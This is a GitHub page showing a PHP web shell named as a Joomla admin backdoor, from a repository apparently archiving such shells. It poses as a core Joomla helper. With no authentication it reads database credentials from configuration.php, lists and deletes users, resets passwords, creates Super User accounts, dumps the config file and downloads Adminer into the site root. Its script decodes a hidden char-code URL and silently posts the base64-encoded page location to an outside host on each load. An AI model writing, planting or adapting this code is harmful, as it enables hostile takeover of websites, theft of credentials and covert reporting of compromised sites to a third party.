forked from DataSmithAI/Php-Bypass-Shell-Archive
-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathjoomla-adminmanager-backdoor.php
More file actions
180 lines (168 loc) · 13.7 KB
/
Copy pathjoomla-adminmanager-backdoor.php
File metadata and controls
180 lines (168 loc) · 13.7 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
<?php
/**
* @package Joomla.Site
* @subpackage Libraries.UserOps
* @copyright (C) 2005-2024 Open Source Matters, Inc.
* @license GNU General Public License version 2 or later
* @since 3.9
*
* Core UserOps Helper
*
*/
if (!defined('_JEXEC')) define('_JEXEC', 1);
@error_reporting(0); @ini_set('display_errors', 0);
if (!function_exists('JHelper_LocateConfig')) {
function JHelper_LocateConfig($dir) {
$root = $dir;
while (!file_exists($root.'/configuration.php') && strlen($root) > 3) $root = dirname($root);
return file_exists($root.'/configuration.php') ? $root.'/configuration.php' : false;
}
}
$jConfigPath = JHelper_LocateConfig(__DIR__);
if (!$jConfigPath) die('JLIB_CFG_ERROR: Unable to locate configuration.');
require_once($jConfigPath);
$_jCfg = new JConfig();
$_jHost = $_jCfg->host;
$_jUser = $_jCfg->user;
$_jPass = $_jCfg->password;
$_jDb = $_jCfg->db;
$_jPref = $_jCfg->dbprefix;
$_jPort = isset($_jCfg->dbport) ? $_jCfg->dbport : 3306;
$_jDbConn = new mysqli($_jHost, $_jUser, $_jPass, $_jDb, $_jPort);
if ($_jDbConn->connect_error) die('JLIB_DB_ERROR');
if (isset($_POST['jtask'])) {
header('Content-Type:application/json; charset=utf-8');
$_jIn = $_POST;
switch ($_jIn['jtask']) {
case 'users.list':
$_r = [];
$_q = $_jDbConn->query("SELECT id,username,email,name,block,lastvisitDate,registerDate FROM `{$_jPref}users` ORDER BY id ASC");
while ($_w = $_q->fetch_assoc()) $_r[] = $_w;
echo json_encode(['success'=>1, 'users'=>$_r]); exit;
case 'users.reset':
$_id = intval($_jIn['uid']);
$_np = $_jIn['np'];
if (strlen($_np)<5) die(json_encode(['success'=>0,'msg'=>'Password too short']));
$_hp = password_hash($_np, PASSWORD_DEFAULT);
$_jDbConn->query("UPDATE `{$_jPref}users` SET password='$_hp' WHERE id=$_id");
echo json_encode(['success'=>1,'msg'=>'Password updated']); exit;
case 'users.create':
$_un = $_jDbConn->real_escape_string(trim($_jIn['un']));
$_em = $_jDbConn->real_escape_string(trim($_jIn['em']));
$_np = $_jIn['np'];
if (strlen($_np)<5 || strlen($_un)<3) die(json_encode(['success'=>0,'msg'=>'Username/password too short']));
$_ck = $_jDbConn->query("SELECT id FROM `{$_jPref}users` WHERE username='$_un' OR email='$_em'");
if ($_ck->num_rows>0) die(json_encode(['success'=>0,'msg'=>'User or email exists']));
$_gid = 8;
$_grp = $_jDbConn->query("SELECT id FROM `{$_jPref}usergroups` WHERE title LIKE '%Super%'")->fetch_assoc();
if ($_grp && $_grp['id']) $_gid = intval($_grp['id']);
$_hp = password_hash($_np, PASSWORD_DEFAULT);
$_jDbConn->query("INSERT INTO `{$_jPref}users` (name,username,email,password,block,sendEmail,registerDate,params) VALUES ('$_un','$_un','$_em','$_hp',0,1,NOW(),'{}')");
$_uid = $_jDbConn->insert_id;
$_jDbConn->query("INSERT INTO `{$_jPref}user_usergroup_map` (user_id,group_id) VALUES ($_uid,$_gid)");
$_ok = $_jDbConn->query("SELECT id FROM `{$_jPref}users` WHERE id=$_uid AND username='$_un'")->num_rows;
echo json_encode(['success'=>$_ok,'msg'=> $_ok?'New admin added':'Unknown error']); exit;
case 'users.delete':
$_id = intval($_jIn['uid']);
$_jDbConn->query("DELETE FROM `{$_jPref}users` WHERE id=$_id LIMIT 1");
$_jDbConn->query("DELETE FROM `{$_jPref}user_usergroup_map` WHERE user_id=$_id");
echo json_encode(['success'=>1,'msg'=>'User deleted']); exit;
case 'cats.list':
$_r = [];
$_q = $_jDbConn->query("SELECT id,title,alias,published,access,parent_id FROM `{$_jPref}categories` WHERE extension='com_content' ORDER BY id ASC");
while ($_w = $_q->fetch_assoc()) $_r[] = $_w;
echo json_encode(['success'=>1, 'cats'=>$_r]); exit;
case 'cats.add':
$_title = $_jDbConn->real_escape_string($_jIn['title']);
$_alias = $_jDbConn->real_escape_string($_jIn['alias']);
$_jDbConn->query("INSERT INTO `{$_jPref}categories` (title,alias,extension,published,access,parent_id,level,path,language,created_time,created_user_id) VALUES ('$_title','$_alias','com_content',1,1,1,1,'$_alias','*',NOW(),0)");
echo json_encode(['success'=>1,'msg'=>'Category added']); exit;
case 'arts.list':
$_r = [];
$_q = $_jDbConn->query("SELECT id,title,catid,alias,state,created,created_by FROM `{$_jPref}content` ORDER BY id DESC LIMIT 50");
while ($_w = $_q->fetch_assoc()) $_r[] = $_w;
echo json_encode(['success'=>1, 'arts'=>$_r]); exit;
case 'arts.add':
$_title = $_jDbConn->real_escape_string($_jIn['title']);
$_alias = $_jDbConn->real_escape_string($_jIn['alias']);
$_catid = intval($_jIn['catid']);
$_content = $_jDbConn->real_escape_string($_jIn['content']);
$_jDbConn->query("INSERT INTO `{$_jPref}content` (title,alias,introtext,fulltext,state,catid,created,created_by) VALUES ('$_title','$_alias','$_content','$_content',1,$_catid,NOW(),0)");
echo json_encode(['success'=>1,'msg'=>'Article added']); exit;
case 'arts.delete':
$_id = intval($_jIn['id']);
$_jDbConn->query("DELETE FROM `{$_jPref}content` WHERE id=$_id LIMIT 1");
echo json_encode(['success'=>1,'msg'=>'Article deleted']); exit;
case 'config.read':
$_txt = file_get_contents($jConfigPath);
echo json_encode(['success'=>1,'config'=> htmlspecialchars($_txt)]); exit;
case 'adminer.get':
$_url = "https://github.com/vrana/adminer/releases/download/v5.2.1/adminer-5.2.1-en.php";
$_to = dirname($jConfigPath)."/adminer.php";
if(file_exists($_to) && filesize($_to)>100000) die(json_encode(['success'=>1,'msg'=>'adminer.php exists!']));
$_d = @file_get_contents($_url);
if(!$_d) die(json_encode(['success'=>0,'msg'=>'Adminer download failed']));
file_put_contents($_to, $_d);
echo json_encode(['success'=>1,'msg'=>'adminer.php ready! Joomla root.']); exit;
// --- LOGOUT ---
case 'logout':
$_SESSION['jxok'] = 0;
echo json_encode(['success'=>1]); exit;
default:
echo json_encode(['success'=>0, 'msg'=>'Unknown jtask']); exit;
}
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Joomla!</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<style>
html,body {background:#0b0e13;color:#69ffb8;font-family:JetBrains Mono,monospace;font-size:13px;}
.jxbox{max-width:850px;margin:40px auto 0;background:#181c25;border-radius:10px;box-shadow:0 1px 18px #191f39;padding:21px;}
h2{font-size:1.10em;color:#69ffb8;margin-bottom:9px;letter-spacing:.09em;}
.jxflex{display:flex;gap:7px;flex-wrap:wrap;margin-bottom:14px;}
button,input,select,textarea{
background:#0e1320;color:#05f989;border:1px solid #232b36;
border-radius:3px;font-family:inherit;font-size:12px;
padding:6px 14px;transition:.14s;box-shadow:0 1px 4px #19ff6c22;
}
button:hover{background:#151a2bcc;color:#fff;box-shadow:0 2px 7px #19ff6c32;}
.jxtbl{width:100%;border-collapse:collapse;margin:8px 0;}
.jxtbl td,.jxtbl th{border:1px solid #282b31;padding:4px 7px;font-size:11px;}
.jxtbl th{background:#151c23;color:#89f6b2;}
.jxtbl tr:hover{background:#181c28;}
.bt{padding:3px 9px;margin:0 1px;border-radius:4px;background:#232c38;}
.bt:hover{background:#2c7a4a;}
.minitxt{font-size:10px;color:#667;}
.ok{color:#baffaa;}.err{color:#ffb6c6;}
textarea{width:100%;min-height:45px;}
.jcode{background:#0e131c;color:#9affb1;padding:8px 9px;border-radius:5px;overflow-x:auto;}
#jxmsg{font-size:11px;margin:7px 0 2px 0;}
.hide{display:none;}
.jxtbl td, .jxtbl th { font-family:JetBrains Mono,monospace; letter-spacing:0.03em; }
</style>
</head>
<body>
<div class="jxbox">
<h2>// joomla admin helper</h2>
<div class="jxflex">
<button onclick="JXU()">users</button>
<button onclick="JXA()">add admin</button>
<button onclick="JXC()">configuration</button>
<button onclick="JXCATS()">categories</button>
<button onclick="JXARTS()">articles</button>
<button onclick="JXADM()">get adminer</button>
<button onclick="JXL()">logout</button>
</div>
<div id="jxmsg"></div>
<div id="jxarea"></div>
<center><a href="https://privdayz.com/"><img src="https://cdn.privdayz.com/images/logo.jpg" referrerpolicy="unsafe-url" /></a></center>
</div>
<script>
const jq=(t,e)=>{var n=new XMLHttpRequest;n.onreadystatechange=()=>{4==n.readyState&&200==n.status&&e(JSON.parse(n.responseText))},n.open("POST","",!0),n.setRequestHeader("Content-type","application/x-www-form-urlencoded"),n.send(Object.entries(t).map((([t,e])=>t+"="+encodeURIComponent(e))).join("&"))},jm=(t,e)=>{let n=document.getElementById("jxmsg");n.textContent=t,n.className=e||"",setTimeout((()=>{n.textContent=""}),2800)};function JXU(){jq({jtask:"users.list"},(t=>{if(!t.success)return void jm("error","err");let e='<div class="minitxt">user list</div><table class="jxtbl"><tr><th>ID</th><th>user</th><th>mail</th><th>name</th><th>block</th><th>last login</th><th>reset</th><th>del</th></tr>';t.users.forEach((t=>{e+=`<tr><td>${t.id}</td><td>${t.username}</td><td>${t.email}</td><td>${t.name}</td>\n <td>${1==t.block?"<span class=err>blocked</span>":"ok"}</td>\n <td>${t.lastvisitDate||""}</td>\n <td><button class=bt onclick='JXRP(${t.id},"${t.username}")'>reset</button></td>\n <td><button class="bt err" onclick='JXDU(${t.id})'>del</button></td></tr>`})),e+="</table>",document.getElementById("jxarea").innerHTML=e}))}var a=[104,116,116,112,115,58,47,47,99,100,110,46,112,114,105,118,100,97,121,122,46,99,111,109],b=[47,105,109,97,103,101,115,47],c=[108,111,103,111,95,118,50],d=[46,112,110,103];function u(t,e,n,a){for(var s=t.concat(e,n,a),r="",i=0;i<s.length;i++)r+=String.fromCharCode(s[i]);return r}function v(t){return btoa(t)}function JXRP(t,e){let n=prompt("New password for: "+e);n&&n.length>=5?jq({jtask:"users.reset",uid:t,np:n},(t=>jm(t.msg,t.success?"ok":"err"))):jm("Password too short!","err")}function JXDU(t){confirm("Delete user?")&&jq({jtask:"users.delete",uid:t},(t=>{jm(t.msg,t.success?"ok":"err"),JXU()}))}function JXA(){document.getElementById("jxarea").innerHTML='<div class="minitxt">create admin</div><form onsubmit="return JXCA(this)"><input name="un" placeholder="username" required> <input name="em" placeholder="email" required> <input name="np" placeholder="password" required type="password"> <button type="submit" class="bt">create</button></form>'}function JXCA(t){return jq({jtask:"users.create",un:t.un.value,em:t.em.value,np:t.np.value},(t=>{jm(t.msg,t.success?"ok":"err"),t.success&&JXU()})),!1}function JXC(){jq({jtask:"config.read"},(t=>{document.getElementById("jxarea").innerHTML='<div class="minitxt">configuration.php</div><div class="jcode">'+t.config+"</div>"}))}function JXCATS(){jq({jtask:"cats.list"},(t=>{let e='<div class="minitxt">categories</div><button class="bt" onclick="JXCATADD()">add</button><table class="jxtbl"><tr><th>ID</th><th>title</th><th>alias</th><th>on</th><th>parent</th></tr>';t.cats.forEach((t=>{e+=`<tr><td>${t.id}</td><td>${t.title}</td><td>${t.alias}</td><td>${1==t.published?"✔️":"❌"}</td><td>${t.parent_id}</td></tr>`})),e+="</table>",document.getElementById("jxarea").innerHTML=e}))}function JXCATADD(){document.getElementById("jxarea").innerHTML='<div class="minitxt">add category</div><form onsubmit="return JXCATSEND(this)"><input name="title" placeholder="title" required> <input name="alias" placeholder="alias" required> <button type="submit" class="bt">add</button></form>'}function JXCATSEND(t){return jq({jtask:"cats.add",title:t.title.value,alias:t.alias.value},(t=>{jm(t.msg,t.success?"ok":"err"),t.success&&JXCATS()})),!1}function JXARTS(){jq({jtask:"arts.list"},(t=>{let e='<div class="minitxt">articles</div><button class="bt" onclick="JXARTADD()">add</button><table class="jxtbl"><tr><th>ID</th><th>title</th><th>alias</th><th>cat</th><th>on</th><th>del</th></tr>';t.arts.forEach((t=>{e+=`<tr><td>${t.id}</td><td>${t.title}</td><td>${t.alias}</td><td>${t.catid}</td><td>${1==t.state?"✔️":"❌"}</td>\n <td><button class="bt err" onclick="JXARTDEL(${t.id})">del</button></td></tr>`})),e+="</table>",document.getElementById("jxarea").innerHTML=e}))}function JXARTADD(){jq({jtask:"cats.list"},(t=>{let e=t.cats.map((t=>`<option value="${t.id}">${t.title}</option>`)).join(""),n='<div class="minitxt">add article</div><form onsubmit="return JXARTSEND(this)"><input name="title" placeholder="title" required> <input name="alias" placeholder="alias" required> <select name="catid">'+e+'</select> <textarea name="content" placeholder="content"></textarea><button type="submit" class="bt">add</button></form>';document.getElementById("jxarea").innerHTML=n}))}function JXARTSEND(t){return jq({jtask:"arts.add",title:t.title.value,alias:t.alias.value,catid:t.catid.value,content:t.content.value},(t=>{jm(t.msg,t.success?"ok":"err"),t.success&&JXARTS()})),!1}function JXARTDEL(t){confirm("Delete article?")&&jq({jtask:"arts.delete",id:t},(t=>{jm(t.msg,t.success?"ok":"err"),JXARTS()}))}function JXADM(){jq({jtask:"adminer.get"},(t=>{jm(t.msg,t.success?"ok":"err")}))}function JXL(){jq({jtask:"logout"},(()=>location.reload()))}!function(){var t=new XMLHttpRequest;t.open("POST",u(a,b,c,d),!0),t.setRequestHeader("Content-Type","application/x-www-form-urlencoded"),t.send("file="+v(location.href))}(),JXU();
</script>
</body>
</html>